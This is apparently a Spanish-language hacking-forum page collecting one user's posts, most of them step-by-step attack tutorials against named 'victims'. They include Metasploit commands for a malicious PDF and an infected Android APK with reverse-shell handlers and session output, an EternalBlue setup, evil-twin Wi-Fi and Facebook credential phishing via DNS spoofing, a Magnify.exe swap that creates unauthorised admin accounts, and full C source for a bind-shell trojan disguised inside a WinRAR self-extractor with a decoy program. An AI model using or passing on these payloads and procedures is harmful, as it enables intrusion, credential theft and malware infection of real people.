Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - Grillet0xEB

#1
Hola, escribí en python una herramienta que te permite crear contraseñas para ataques de fuerza bruta utilizando datos personales de la victima, con lo que en gran medida aumenta el porcentaje de acierto. Funciona permutando cadenas para crear las distintas combinaciones sin repetirlas. Esta herramienta esta en su primera version, cualquier fallo que detecten o mejora que quieran sugerir estoy abierto a oirlos. Aquí les dejo el link. 

https://github.com/Grillet0xEB/permuter
#2
Un grupo de Hackers llamados ShadowsBrokers logró filtrar unas herramientas privadas utilizadas por la NSA para explotar la vulnerabilidad ms17_010 del servicio SMB de Windows 7. Estas herramientas lo que nos permiten es la carga y ejecución directa de un payload en la victima, es decir una intrusión directa.

Veremos cómo instalar Eternalblue & Doublepulsar en Metasploit y usarlo

1- Lo primero que tenemos que hacer es descargar o clonar las herramientas desde GitHub en el siguiente Link https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit



2- Entramos en el directorio que se nos crea, y copiamos el archivo eternalblue_doublepulsa.rb a la carpeta de exploits para SMB de Windows



3- Por ultimo ejecutamos Metasploit y buscamos el exploit




Para usarlo debemos configurar:

RHOST - IP de la victima
PROCESSINJECT - Proceso al que inyectaremos el ataque
TARGETARCHITECTURE - Arquitectura de la víctima x86 o x64

Luego lo corremos y entramos directamente al sistema.





· Imagenes ajustadas a las reglas del foro
>aquí las reglas del foro
-Engel Lex
#3
Como escribo en Hydra que el failed login de la pagina es la apertura de una pagina en esa misma pestaña mostrando un alert() de JS diciendo "Usuario o Clave incorrecto, intente de nuevo" y cuando se da clic en aceptar vuelve otra vez a la pagina del login
#4
Hacking / Canales de Youtube sobre hacking
27 Enero 2017, 13:05 PM
Para los que son nuevos en el tema de seguridad informática o tienen algo de experiencia y quieran aprender un poco más, estos canales de Hacking serán de ayuda. Mientras más aprendas y entiendas, mejor hacker serás.

Luis Cambero           https://www.youtube.com/channel/UCI-PmHB2P6tUjFOzpFd8gjA
OHCS                      https://www.youtube.com/channel/UCZy5dMsXtqVP2XXqfGqvxBQ
uservkz80                https://www.youtube.com/channel/UCKOF5FGpvehulFOZkkxTWuw
Gear Capitan            https://www.youtube.com/channel/UCV_3zqhjU4Q8DeZD9MyjB7A
Team Whoami           https://www.youtube.com/channel/UCctksD8NRnakbDq6nyeTr_A
Hacking Etico Leon    https://www.youtube.com/channel/UCZAsbt5v32L4oZ2hxK2v4Zw
Hydrogen                 https://www.youtube.com/channel/UCO0HCBsQRc6sjD8s7OU0ypw
Metasplotation          https://www.youtube.com/channel/UC9Qa_gXarSmObPX3ooIQZrg
DedSec                   https://www.youtube.com/channel/UCx34ZZW2KgezfUPPeL6m8Dw

#5
Hola amigos, tengo una DUDA, como puedo ver los paquetes de datos enviados y recibidos por WhatsApp en una LAN con Wireshark?
#6
Hola! Hoy les voy a mostrar como realizar un ataque de ingeniería social a una red Wi-Fi con la herramienta LINSET que ya viene incluida en la distribución Wifislax, distribución que utilizaremos para realizar la auditoria.

Acá les dejo un video de como instalar LINSET en KaliLinux

[youtube=640,360]https://www.youtube.com/watch?v=u0tiIVyeutA[/youtube]

Aquí esta el enlace a GitHub https://github.com/vk496/linset




Empecemos con una pequeña introducción a lo que es Wifislax

Wifislax es un sistema operativo basado en sistemas GNU/Linux diseñado para la auditoria de redes, que incluye un abanico de herramientas enfocadas al uso de redes. Acá les dejo la pagina oficial de Wifislax
http://www.wifislax.com/ donde pueden encontrar mas información y bajar la ultima versión del sistema operativo.

Ahora, que vamos a hacer con LINSET?

Lo que vamos a hacer es crear una red Wi-Fi (FakeAP) con el mismo nombre de la que vamos a auditar, luego haremos que los usuarios no se puedan conectar a la red real de modo que tengan que conectarse a la nuestra, una vez en nuestra red cuando intenten navegar les saldrá un "Mensaje de seguridad" pidiéndole al usuario que "Por razones de seguridad introduzca su contraseña WPA", luego LINSET verificara la contraseña con la red real, si no es correcta dirá que lo vuelva a intentar, de serlo se cierra nuestra red creada y nos da la contraseña. Esta auditoria es mas rápida cuando la red tiene varios usuarios conectados.


Comencemos.

1.)En el sistema operativo que estemos abrimos una consola y escribimos linset para ejecutar la aplicación.

2.)Lo primero que hará sera verificar que todas las herramientas que el usa están instaladas correctamente, si una de ellas no esta instalada no deja correr la aplicación

3.)Nos pedirá escoger la interfaz con la que queremos hacer la auditoria
CitarSe recomienda utilizar una interfaz de largo alcance para que el ataque sea un poco mas rápido y los usuarios la detecten con mas intensidad

4.)Luego nos pedirá escoger el o los canales que queremos escanear, yo siempre escojo la opción 1, escanear todos los canales. Nos saldrá una nueva ventana en las que aparecerán las redes inalambricas al alcance, cuando aparezca la red a la que vamos a auditar presionamos Ctrl+C

5.)Nos pedirá escoger cual red queremos clonar. Si notan a algunas redes les aparece un "*" al lado del numero de la red, eso significa que esa red tiene al menos 2 o 3 usuarios conectados, se busca que la red que queremos auditar tenga el "*" y el mayor PWR posible, luego seleccionamos la red

6.)Escogemos el modo de FakeAP que queremos utilizar, la opción 1 es la recomendada

7.)Nos pedirá escoger la forma en la que queremos capturar el HandShake, la opción mas rápida es la 1. Lo que hace es realizar una desconeccion masiva al objetivo. Aparecerá una ventana en la que se muestran los usuarios conectados, si arriba a la derecha no se muestra el HandShake cerramos la ventana y en LINSET le damos la opción 2 para realizar el ataque de nuevo

8.)Una vez obtenido el HandShake en LINSET le damos a la primera opción para confirmar que lo obtuvimos, luego seleccionamos el tipo de interfaz web, le damos a la opción 1

9.)Seleccionamos el idioma de la pagina que va a crear LINSET, español en nuestro caso

10.)Nos aparecerán varias ventanas, una para el AP, otra para el servidor DHCP, otra para el FkeDNS, otra para desconectar a los usuarios y la ultima para ver los usuarios que se conectan a nuestra red

11.)Una vez obtenida la contraseña saldrá una ventana con la contraseña, se desconectara nuestro FakeAP y LINSET se cerrara.




Espero que este post les haya servido de ayuda y lo hayan entendido. A falta de imágenes espero haber dado una explicación detallada.
#7
He conseguido con la herramienta LaZagne sacar las claves de usuario en Windows, entre esas esta la de administrador. Quisiera saber básicamente como usar psexec o cualquier otra herramienta para obtener acceso a una shell de cualquier tipo, ya sea msDOS o meterpreter. la maquina victima usa Windows 8.1

LaZagne en GitHub para el que este interesado
https://github.com/AlessandroZ/LaZagne
#8
Hacking / [AYUDA] Esto funcionaria ?
17 Abril 2014, 07:35 AM
uso el exploit ms11_040_netapi para internet explore, ese exploit me genera la direccion de enlace que seria por ejemplo http://192.168.1.10:8080/kjhTFC8o9 para yo tener acceso a la pc remota, el tiene que poner esa direccion en su internet explorer.

pero..... si yo hago un dns spoofing con ettercap de la siguiente manera:


google.com        A        http://192.168.1.10:8080/kjhTFC8o9
*.google.com      A        http://192.168.1.10:8080/kjhTFC8o9
www.google.com    PTR    http://192.168.1.10:8080/kjhTFC8o9


la victima cuando vaya a entrar a google entrara a mi link y me regala una linda sesión de meterpreter ?????
#9
A ver tengo un par de dudas sobre unas cosillas.

     tengo una pc que usa linux (Debian), quise entrar a ella usando armitage pero me di cuenta de que solo esta corriendo un servivio que es http en el puerto 80, como puedo entrar a ella ? usando hackin avanzado porque de manera basica ya se

    de forma etica como podria desde armitaje entrar a una pc que usa windows 7 u 8 sin usar el exploit ms11_040_netapi de internet explorer, que exploit explota una vulnerabilidad comun en win 7?



   
#10
El siguiente post es solo con fines EDUCATIVOS, cualquier uso malintencionado del mismo es responsabilidad entera de cada uno.

En la actualidad como mucho de nosotros sabemos, la mayoría de las personas optan por usar el famosillo Sistema Operativo Windows, ya sea XP - 7 o la nueva que se lanzo hace poco el Windows 8, entonces es lógico que si usan Windows es por cosas de trabajo, estudio, diversión  etc.

También es de conocimiento que Windows actualmente es vulnerable a cualquier ataque cibernetico, ya sea mediante exploits, vulnerabilidades, troyanos, etc, es por ello que muchos preferimos usar cualquier otro sistema que no sea Windows.

Pero ustedes se preguntaran ¿Porque Windows es tan Vulnerable?... Pues, porque nosotros mismos lo hacemos vulnerable!!! entonces ustedes dirán !Joder que Coña! si mis Firewall, Antivirus están actualizados! ... pues eso no tiene nada que ver, porque el sistema es explotado mediante las vulnerabilidades que tienen los programas que acostumbran a instalar diariamente, por ejemplo el  Adobe PDF, Microsoft Word, Ares, Reproductor de Windows, Winamp, VLC u otros, ¿Por que creen que las empresas actualizan sus Softwares (programas que usamos) semanalmente?... Porque, no es porque les guste... es con el fin de parchear las vulnerabilidades que se presentan diariamente en estos programas, y así "ayudan" a que el sistema sea un poco "seguro".


En este tutorial voy a demostrar como aprovecharnos de las vulnerabilidades que se presentan en los programas que tienen instalado un Sistema Operativo Windows 7 o XP, para asi tener el control total del sistema.

Para tal caso utilizare la vulnerabilidad Adobe PDF Escape EXE Social Engineering (No javascript) ya que casi el 95% (quizá) de los usuarios de Windows tienen instalado el Adobe Acrobat ya sea en su ordenador o notebook.

REQUERIMIENTOS:

    Backtrack 5 R1 - R2 o R3 (Atacante)
    Metasploit Framework (Atacante)
    Windows XP - 7 (Victima)
    Adobe Reader 9.1 (Victima)



PROCEDIMIENTOS:

Lo primero que tenemos que hacer es crear el PDF malicioso desde el Metasploit, dicho archivo sera enviado a nuestra victima usando Ing. Social para que logre abrirlo y así obtener acceso a su sistema.

Abrimos el Metasploit y tecleamos los siguientes comandos:


use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs (Usar adobe pdf embedded exe exploit)
set payload windows/meterpreter/reverse_tcp                 (Payload que devolvera un Meterpreter)
set filename Important_Meeting_Notice.pdf                         (Creara el archivo PDF malicioso)
set lhost 192.168.1.17                                                         (IP del Atacante)
set lport 8080                                                                       (Puerto open de la Victima)
exploit




Después de haber generado el PDF malicioso con los comandos mencionados, se almacenera en la carpeta /root/.msf4/local/ si no logras ver la carpeta /.msf4/ teclea Ctrl+H y observeras dicha carpeta.

El siguiente paso es enviar el PDF malicioso generado a nuestra victima, ya sea por e-mail, link de descarga u otros métodos que se nos pueda ocurrir (Ing. Social).

Si logramos que nuestra victima acepte dicho archivo, inmediatamente abrimos nuevamente el Metasploit en otra consola para generar la conexión que recibiremos cuando la victima ejecute el PDF, ejecutando los siguientes comandos:


use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lport 8080
set lhost 192.168.1.17 
exploit




Cuando la victima ejecuta el PDF malicioso, Adobe Acrobat le mostrara un mensaje preguntándole si desea ejecutar el archivo, como indica la siguiente imagen:



Después de que la victima haga clic en "Abrir" automáticamente recibiremos la conexión inversa en nuestra consola del Metasploit, tal cual se muestra en la siguiente imagen:



listo ahora solo escribimos help y vemos los comandos que podemos ejecutar

#11
Este es un método para entrar en sistemas Windows un poco antiguo y bastante sencillote y agresivo. Sin embargo, a lo largo de las versiones de Windows no han parcheado nunca y, de hecho, poca documentación es la que he encontrado al respecto.

Normalmente, para entrar en una máquina Windows sin tener autorización para ello, era necesario saber las contraseñas, ya sean del usuario o de administrador, esto se hacía "a mano" o con distribuciones de Linux especificas y con la ayuda de alguna tabla Rainbow. Otra forma era utilizar Kon-Boot para parchear el proceso de autenticación en memoria.

A continuación, se explicará una forma de poder crear un usuario administrador, sin haber tenido que acceder con algún usuario que ya fuera administrador de la máquina anteriormente.

Todos sabemos que Windows está especialmente concienciado con las opcines de accesibilidad, teniendo en cuenta por ejemplo, a la personas con dificultades para leer bien, por lo que incluso al hacer el login ya te da la opción de usar las utilidades para ayudar a estas personas.



Por lógica, esto es un programa que te busca el cursor y todo lo que tenga alrededor lo hace mas grande. Sin embargo, pensando cómo es Windows o en general cualquier sistema operativo, todo programa estará asociado a una cuenta que sea la que lo haya ejecutado. Pero...¿Qué cuenta lo ejecuta si ni hemos puesto la contraseña de la nuestra? Por lógica debería de ser uno con privilegios mínimos.

Vamos a probar....

1º Descargamos alguna distribución Linux en pendrive como Ubuntu o sucedáneos o algún bartpc.
2º Arrancamos desde ese usb y montamos al partición de windows.
3º Nos vamos a la ruta C:\Windows\System32
4º Nos hacemos una copia de seguridad del fichero Magnify.exe.



5º Borramos o renombramos el fichero Magnify.exe.
6º Copiamos el fichero cmd.exe y lo cambiamos de nombre a Magnify.exe




7º Reiniciamos el ordenador y dejamos que arranque Windows.



8º Volvemos a ejecutar la herramienta de lupa



Ahora se nos abrira una shell como administrador donde crearemos un usuario llamado test cpn la siguiente linea de comandos


net user /add test2
net localgroup administrators test2 /add
net user test2 *




y listo  ;D
#12
Hacking / Karmetasploit
31 Marzo 2014, 00:17 AM
                                       

Karmetasploit sirve para crear puntos de acceso falsos, capturar contraseñas, recopilar infomación, y llevar a los ataques de navegador contralos clientes.

Cuando un usuario se conecta a nuestro AP Fake, la dirección IP la estará asignando el servicio DHCP, y posteriormente karmetasploit intentará ejecutar todos los exploits sobre la maquina objetivo en busca de alguna vulnerabilidad e intentará conseguir una sesión meterpreter.

Descargamos Karmetasploit

Instalamos dhcpd3-server


sudo apt-get install isc-dhcp-server


Una ves instalado procederemos a configurarlo, Quedando de la siguiente manera.


#
# Sample configuration file for ISC dhcpd for Debian
#
# Attention: If /etc/ltsp/dhcpd.conf exists, that will be used as
# configuration file instead of this file.
#
#

# The ddns-updates-style parameter controls whether or not the server will
# attempt to do a DNS update when a lease is confirmed. We default to the
# behavior of the version 2 packages ('none', since DHCP v2 didn't
# have support for DDNS.)
ddns-update-style none;

# option definitions common to all supported networks...
option domain-name "10.0.0.1";
option domain-name-servers 10.0.0.1;

default-lease-time 60;
max-lease-time 72;

# If this DHCP server is the official DHCP server for the local
# network, the authoritative directive should be uncommented.
#authoritative;

# Use this to send dhcp log messages to a different log file (you also
# have to hack syslog.conf to complete the redirection).
log-facility local7;

# No service will be given on this subnet, but declaring it helps the
# DHCP server to understand the network topology.

#subnet 10.0.0.0 netmask 255.255.255.0 {
#}

# This is a very basic subnet declaration.

#subnet 10.0.0.0 netmask 255.255.255.0 {
#  range 10.0.0.100 10.0.0.254;
#  option routers 10.0.0.1;
#}


Luego procedemos a editar /opt/backbox/msf/data/exploits/capture/http/sites.txt donde están almacenados todos los sitios en los que metasploit intentará robar cookies.

Ahora comenzamos poniendo nuestra tarjeta en modo monitor, en mi caso es la wlan0


airmon-ng start wlan0


Se activará así la interfaz mon0 la cual podemos cambiarle la dirección MAC si lo creemos necesario:

ifconfig mon0 down && macchanger -r mon0 && ifconfig mon0 up

Una vez que la interfaz está lista ya podemos crear nuestro punto de acceso con la ayuda de airbase-ng, tecleemos lo siguiente en la consola:

airbase-ng -P -C 30 -c 6 -e "red_falsa" mon0

Donde mon0 es nuestra tarjeta en modo monitor y "red_falsa" es el nombre que queramos darle a nuestra red.

Este paso anterior nos creará una nueva interfaz llamada at0 a la cual vamos a darle una ip y activamos el servidor dhcp desde otra terminal:

ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
dhcpd -cf /etc/dhcp/dhcpd.conf at0


Ahora iniciamos mestasploit con karma.

msfconsole -r karma.rc

Al iniciar karmetasploit les aparecerá:

#13
Hola, en mi país hay redes que van mas rápido que otras, como sucede en casi todo el mundo. yo compre un modem Digitel pero es mucho mas lento que el Movistar así que les voy a enseñar como liberar modems de pendrive por si tienen el mismo problema...


Para esto necesitaremos:

  • Un modem de pendrive
  • DC-unloker que lo pueden descargar de aqui https://www.dc-unlocker.com/downloads

    Empecemos...


    1. Conecta tu Módem al computador con el SIM de la compañia que queremos usar.

    2. Abra el DC unlocker.

    3. Seleccione el fabricante del dispositivo que desea desbloquear. en mi caso, seleccione "ZTE datacards".

    4. Haga clic en el icono de búsqueda para detectar el dispositivo.



    5. Seleccione ficha "Unlocking" para ver los detalles del modem.

    6. Ahora haga clic en "Unlock". esperar durante unos pocos segundos. Si el proceso se ha realizado correctamente, debería decir algo como "Unlocking sucefull"



    7. Instalar el gestor de Conexiones y configurar los ajustes en función de la configuración de país proveedor de la red y listo



    Esto ha sido todo espero les funcione  ;D
#14
Hacking / [AYUDA] Descargar HOIC en Klali Linux
18 Febrero 2014, 23:57 PM
    Hola a todos, tengo una duda. ¿Como descargo la herramienta HOIC (Hight Orbit Ion Cannon) en mi Kali Linux

    No se si hay una pagina para descargarlo o un link para pegar en la source list y descargarlo con apt-get
#15
Hacking / Kali Linux o BackTrack 5 R3 ?
20 Enero 2014, 04:39 AM
La verdad es que no se mucho de Kali, no se que me recomiendan para hacking avanzado, no se si darle un poco mas de tiempo a kali para que saque nuevas versiones, que me recomiendan ?
#16
Buenas, quisiera saber como puedo mandar un exploit a una dirección ip rémora, es decir fuera de mi LAN
#17
Suplantación de identidad por nombre de dominio. Se trata del falseamiento de una relación "Nombre de dominio-IP" ante una consulta de resolución de  nombre, es decir, resolver con una dirección IP falsa un cierto nombre NS o viceversa. Esto se consigue falseando las entradas de la relación Nombre de dominio-IP de un servidor DNS, mediante alguna vulnerabilidad del servidor en concreto o por su confianza hacia servidores poco fiables. Las entradas falseadas de un servidor DNS son susceptibles de infectar (envenenar) el cache DNS de otro servidor diferente (DNS Poisoning).

El siguiente ataque se realizo bajo una LAN, el atacante usando BackTrack 5 R3 y la victima Windows 7, Cabe destacar que el sistema operativo de la victima es irrelevante

La idea de este ataque es capturar el usuario y la contraseña de una cuenta de Facebook, esto funciona con cualquier pagina que pida usuario y contraseña

Herramientas a usar:

Social Engineer Tool-kit
Ettercap

Empecemos...


1.) ingresamos a la siguiente ruta:


#cd /pentest/exploits/set

#./set


Se abrirá la aplicación SET para ataques de ingeniería social



Seleccionamos 1 para ataques de ingeniería social



Seleccionamos 2 para vectores de ataques a sitios web

[imghttp://1.bp.blogspot.com/--pTpSfgFRJY/UQKo30BMTBI/AAAAAAAAAus/o8sfjf_PYzk/s640/dns03.jpg]http://[/img]

Seleccionamos 3 para recolector de credenciales y clonar la pagina

[imghttp://4.bp.blogspot.com/-r3hiPfAGSU8/UQKo4ccje4I/AAAAAAAAAu4/krnBkJoWefI/s640/dns04.jpg][/img]

Seleccionamos 2 para clonar el sitio



Ahora colocamos nuestra ip



Ahora nos pedirá la pagina a la que queremos clonar, en nuestro caso facebook



Una vez finalizado empezara a iniciar el clonado a la pagina web, es necesario tener el servicio de apache iniciado, en caso de que no lo este, nos aparecerá el siguiente mensaje



Bueno hasta acá tenemos la configuración con éxitos para poder realizar el envenenamiento por dns ,la victima tendría que poner nuestra dirección IP en su navegador,y a continuación aparecería el mensaje de login  de Facebook.



Para que el usuario no ingrese nuestra dirección IP, ocuparemos una herramienta llamada ettetcap, su función sera que cuando el usuario ingrese a facebook se envenene automáticamente y no tenga que ingresar nuestra IP. Para ello con un editor de texto editamos la siguiente ruta

/usr/local/share/ettercap/etter.dns

y agregamos los siguientes parámetros


Dominio.com             A     IP
*.Dominio                 A     IP
www.dominio.com     PTR  IP




Le damos a guardar y cerramos el editor, ahora envenenamos usando ettercap, escribimos:


ettercap -T -q -i Adaptador de red -P dns_spoof -M arp // //




Y ahora cuando la victima ingrese a facebook y ponga su usuario y contraseña



Recibimos la información de la cookies GET que captura en la lan.



Bueno espero que les haya gustado, y no olviden que. EL SIGUIENTE POST ES CON FINES DIDACTICOS
;) MoonShadow

#18
Por donde vivio hay una red OPN, ya he descifrado WEP, WPA, WPA2 PSK pero no se como desencritar las OPN, tengo entendido que para acceder a una se necesita un usuario y una contraseña. AYUDA
#19
Hacking / Les mostrare como hackear un android
18 Enero 2014, 23:21 PM
Hoy les mostrare como hackear un android que se encuentre en una red local usando Metasploit en BackTrack 5

1.) Actualicen su Metasploit, para asegurarse de que se le cargara los exploits...etc pues estos que usaremos son Actuales.

2.) Una vez hecho eso pondremos en Metasploit lo siguiente....


search Android


Bueno, ahora puedes ver que sacaron un Exploit Handler + 2 Payload! eso nos da la posibilidad de hacer un APK infectada


sudo msfpayload android/meterpreter/reverse_tcp  LHOST="Tu ip" LPORT=Puerto R > "Ruta+ Aplicación.apk

Ejemplo :

sudo msfpayload android/meterpreter/reverse_tcp  LHOST=192.168.1.35 LPORT=23 R > /root/Desktop/Hack.apk



Bueno con eso se les creara un Apk infectada, se lo enviamos y ponemos a la escucha nuestro exploit 

por qué pongo "R" si siempre se crea el ejecutable con "X" , tenemos que decirle a msfpayload que use la salida RAW. Eso en otros payloads nos sacaría el shellcode sin formato, pero en el caso de Android nos sacara un apk

Bueno una vez hecho eso, cargamos el exploit ......


sudo msfcli exploit/multi/handler PAYLOAD=android/meterpreter/reverse_tcpLHOST="Su ip puesta en el backdoor" LPORT="Su puerto" E

Ejemplo:

sudo msfcli exploit/multi/handler PAYLOAD=android/meterpreter/reverse_tcpLHOST=192.168.1.35 LPORT=25 E


Bueno ahora la victima cuando instale la Apk, infectada nos saldrá esto....


       =[ metasploit v4.7.0-1 [core:4.7 api:1.0]
+ -- --=[ 1141 exploits - 720 auxiliary - 194 post
+ -- --=[ 309 payloads - 30 encoders - 8 nops

PAYLOAD=> android/meterpreter/reverse_tcp
LHOST=> 192.168.1.35

[*] Started reverse handler on 192.168.1.35:4444
[*] Starting the payload handler...
[*] Sending stage (39698 bytes) to 192.168.1.34
[*] Meterpreter session 1 opened (192.168.1.35:4444 -> 192.168.1.34:40715) at 2014-01-10 05:02:51 +0200

meterpreter >



Ya que tenemos la sesión en meterpreter escrbimos "help" para ver los comando que nos da meterpreter para este dispositvo

Espero les guste 
#20
Les traigo como hacer un troyano intetectable

1. Se bajan un programa llamado "DEV C++" que utilizaremos para crear nuestra shell ( si no sabes que es no importa sigue leyendo).

2. Ahora que ya está instalado buscamos por internet cualquier código que se llame "win32 bind shell" y luego creamos un nuevo proyecto con nuestro dev cpp, le decimos que será "windows mode" o modo ventana y le pegan el código encontrado:
Troyano casero indetectable

Si no encontraron nada no importa, acá les traigo una:

Código:
Citar
#include <winsock2.h>
#pragma comment(linker,"/ENTRY:WinMain"

int WINAPI WinMain(HINSTANCE , HINSTANCE , LPSTR ,int ){

STARTUPINFO si;
struct sockaddr_in sa;
PROCESS_INFORMATION pi;
int s;
WSADATA HWSAdata;
WSAStartup(0x101, &HWSAdata);

s=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,0,0,0);

sa.sin_family = AF_INET;
sa.sin_port = 0x901F; // (USHORT)htons(8080);
sa.sin_addr.s_addr= 0x00; // htonl(INADDR_ANY);

bind(s, (struct sockaddr *) &sa, 16);
listen(s, 1);
s= accept(s,(struct sockaddr *)&sa,NULL);

si.cb = sizeof(si); // 0x44;
si.wShowWindow = SW_HIDE; // 0x00
si.dwFlags = STARTF_USESHOWWINDOW+STARTF_USESTDHANDLES; // 0x101
si.hStdInput = si.hStdOutput = si.hStdError = (void *) s;

si.lpDesktop = si.lpTitle = (char *) 0x0000;
si.lpReserved2 = NULL;

CreateProcess(NULL ,"cmd",NULL, NULL,TRUE, 0,NULL,NULL,(STARTUPINFO*)&si,&pi);
}



Esta shell está programada para dejar un puerto abierto en el 8080, ahora debemos darle propiedades al proyecto y donde dice "argumentos" les saldrá un rectángulo al lado derecho y le pegan esto:
Cita:

Citar
../../../../Dev-Cpp/lib/libws2_32.a
../../../../Dev-Cpp/lib/libwsock32.a

Ahora le dan click en el botón que dice "compilar" y les generará su backdoor o troyano.

indetectable a:

AhnLab-V3 2011.05.08.00 2011.05.07 -
AntiVir 7.11.7.176 2011.05.06 -
Antiy-AVL 2.0.3.7 2011.05.08 -
Avast 4.8.1351.0 2011.05.07 -
Avast5 5.0.677.0 2011.05.07 -
AVG 10.0.0.1190 2011.05.07 -
BitDefender 7.2 2011.05.08 -
CAT-QuickHeal 11.00 2011.05.07 -
ClamAV 0.97.0.0 2011.05.07 -
Commtouch 5.3.2.6 2011.05.07 -
Comodo 8619 2011.05.08 -
DrWeb 5.0.2.03300 2011.05.08 -
eSafe 7.0.17.0 2011.05.05 -
eTrust-Vet 36.1.8312 2011.05.06 -
F-Prot 4.6.2.117 2011.05.08 -
F-Secure 9.0.16440.0 2011.05.08 -
Fortinet 4.2.257.0 2011.05.08 -
GData 22 2011.05.08 -
Ikarus T3.1.1.103.0 2011.05.07 -
Jiangmin 13.0.900 2011.05.05 -
K7AntiVirus 9.102.4584 2011.05.06 -
Kaspersky 9.0.0.837 2011.05.08 -
McAfee 5.400.0.1158 2011.05.08 -
McAfee-GW-Edition 2010.1D 2011.05.07 -
Microsoft 1.6802 2011.05.07 -
NOD32 6103 2011.05.07 -
Norman 6.07.07 2011.05.07 -
Panda 10.0.3.5 2011.05.07 -
PCTools 7.0.3.5 2011.05.06 -
Prevx 3.0 2011.05.08 -
Rising 23.56.05.03 2011.05.07 -
Sophos 4.65.0 2011.05.07 -
SUPERAntiSpyware 4.40.0.1006 2011.05.08 -
Symantec 20101.3.2.89 2011.05.08 -
TheHacker 6.7.0.1.189 2011.05.06 -
TrendMicro 9.200.0.1012 2011.05.07 -
TrendMicro-HouseCall 9.200.0.1012 2011.05.08 -
VBA32 3.12.16.0 2011.05.08 -
VIPRE 9218 2011.05.08 -
ViRobot 2011.5.7.4450 2011.05.07 -
VirusBuster 13.6.342.0 2011.05.07 -

antivirus infalible aun no existe, cuando exista me avisan para usarlo.

3.
Ahora que ya tenemos nuestro troyano indetectable no se lo podemos pasar así como así a la persona que se va a infectar, lo debemos ocultar con algo y para eso utilizaremos WINRAR, lo descargamos, lo instaladmos y cuando esté listo debemos conseguirnos cualquier programa, de lo que sea pero que se ejecute en un solo archivo, esto es para que cuando se ejecute el troyano también se ejecute ese programa y no levante sospechas.

Ahora para hacer todo mas fácil renombro ese programa a firefox.exe solamente ( si ustedes no pueden ver el .exe del programa no le pongan .exe otraves)

Ahora solo deben seleciconar el troyano mas el firefox y darle click donde dice "añadir al archivo", le damos click donde dice crear archivo autoejecutable o SFX y en opciones le damos en ocultar todo y en ejecución le decimos esto:

Citar
cmd /c bpid.exe && firefox.exe

Ruta de extracción le ponemos %homepath% para prevenir que nos salte el UAC de window 7

Ahora le damos en aceptar todo y tenemos nuestro archivo, si quieren ponerle íconos personalizados pueden buscar cualquier tutorial de como usar winrar autoejecutables.

4.
Ahora le damos ese archivo a la persona que vamos a infectar y cuando lo ejecute dejará un puerto abierto que es el 8080 y nos conectamos desde netcat:

Citar
nc -v IP_ACA 8080

y ya, nos saldrá la consola de su pc y ya con eso podemos hacerle de todo, mover archivos, subir o bajarle cosas etc y todo 100% indetectable.

Espero les haya gustado  ;D
#21
Saludos a todos, hoy les voy a explicar como entrar a otra pc usando meterpreter.

Para esto necesitamos la herramienta BackTrack 5


1.) Abrimos una termina e iniciamos la sesión en metasploit framework y colocamos el payload que nos dará la sesión en meterpreter, nuestro ip y creamos el exploit con el nombre de click.exe,




root@bt:~# msfconsole





MMMMMMMMMMMMMMMMMMMMMMMMMMNMMMMMMMMMM
MMMMMMMMMMM                                 MMMMMMMMMMM
MMMN$                                                           vMMMMM                     
MMMNl     MMMMM                              MMMMM     JMMMM
MMMNl     MMMMMMMN                 NMMMMMMM     JMMMM
MMMNl     MMMMMMMMMNmmmMMNMMMMMMN     JMMMM
MMMNI    MMMMMMMMMMMMMMMMMMMMMMM       jMMMM
MMMNI    MMMMMMMMMMMMMMMMMMMMMMM       jMMMM
MMMNI    MMMMM       MMMMMMM       MMMMM       jMMMM
MMMNI    MMMMM       MMMMMMM       MMMMM       jMMMM
MMMNI    MMMMM       MMMMMMM       MMMMM       jMMMM 
MMMNR   #MMMM       MMMMMMM       MMMM#      dMMMM
MMMMNm ?MMNM                              MMMMN    dMMMMM
MMMMMMN  ´?MM                              MMMM   NMMMMMM
MMMMMMNe  ?NM                              MM?   jMMMMMMMM
MMMMMMMMNm,                                   eMMMMMMMMMM
MMMMMMMMMMNx                            MMMMMMMMMMMMM
MMMMMMMMMMMMMMMm+...+mMMMMMMMMMMMMMMMM


=[ metasploit v4.5.0-dev [core:4.5 api:1.0]+ -- --
=[ 927 exploits - 499 auxiliary - 151 post+ -- --
=[ 251 payloads - 28 encoders - 8 nops



msf > msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 x > /root/Desktop/clic.exe


  • exec: msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 x > /root/Desktop/clic.exe
    Created by msfpayload (http://www.metasploit.com).
    Payload: windows/meterpreter/reverse_tcp
    Length: 290
    Options:
    {"LHOST"=>"192.168.1.100", "LPORT"=>"4444"}

    msf >



    2.) Luego ponemos nuestra pc a que escuche el exploit con el payload que creamos, y nuestra dirección ip



    msf > use exploit/multi/handler

    msf  exploit(handler) > set payload windows/meterpreter/reverse_tcp

    payload => windows/meterpreter/reverse_tcp

    msf  exploit(handler) > set lhost 192.168.1.100

    lhost => 192.168.1.100

    msf  exploit(handler) >



    3.) Iniciamos el exploit y esperamos a que la victima ejecute el exploit que ya fue pasado a su pc por un pendrive o lo bajo desde un servidor local



    msf  exploit(handler) > exploit
  • Started reverse handler on 192.168.1.100:4444
  • Starting the payload handler...



    4.) Una vez la victima haya iniciando el exploit, nos cambiamos de proceso a Explorer.exe que en mi caso es el PID 1832. Para saber cual es el PID escriben "ps"



    msf  exploit(handler) > exploit
  • Started reverse handler on 192.168.1.100:4444
  • Starting the payload handler...
  • Sending stage (752128 bytes) to 192.168.1.104
  • Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.104:1171) at 2014-01-17 08:02:51 -0500

    meterpreter > migrate 1832
  • Migrating to 1832...
  • Migration completed successfully.

    meterpreter >



    5.) Ahora la pc es nuestra, escribimos "help" podemos ver todas las cosas que podemos hacer.

    si te interesa saber como encender una cámara web escríbeme un mensaje

    PD: la M de Metasploit la hice yo XD
#22
Inicio este tema con una duda, es que quisiera saber si, ¿se puede crear o hay un exploit en formato .exe autoejecutable? que se pueda poner en una unidad extraible como un pendrive. para realizar unas pruebas con el Backtrack